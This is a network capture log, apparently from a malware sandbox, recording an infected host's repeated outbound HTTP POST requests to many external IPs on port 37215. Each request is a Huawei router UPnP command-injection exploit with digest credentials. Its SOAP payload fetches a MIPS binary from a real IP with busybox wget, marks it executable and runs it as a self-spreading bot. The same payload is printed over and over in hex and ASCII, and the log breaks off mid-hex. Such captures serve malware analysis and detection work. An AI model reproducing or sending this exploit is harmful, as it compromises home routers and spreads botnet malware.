                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2184192.168.2.134478465.144.208.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595503092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2185192.168.2.1349604197.46.22.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595513105 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2186192.168.2.1344926157.103.10.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595520973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2187192.168.2.133293041.124.48.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595541000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2188192.168.2.1333652197.17.158.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595545053 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2189192.168.2.136079241.35.9.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596070051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2190192.168.2.1341096157.79.0.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596071005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2191192.168.2.1349748157.239.42.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596167088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2192192.168.2.1345154184.143.19.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596237898 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2193192.168.2.1347818157.101.74.18137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.596261978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 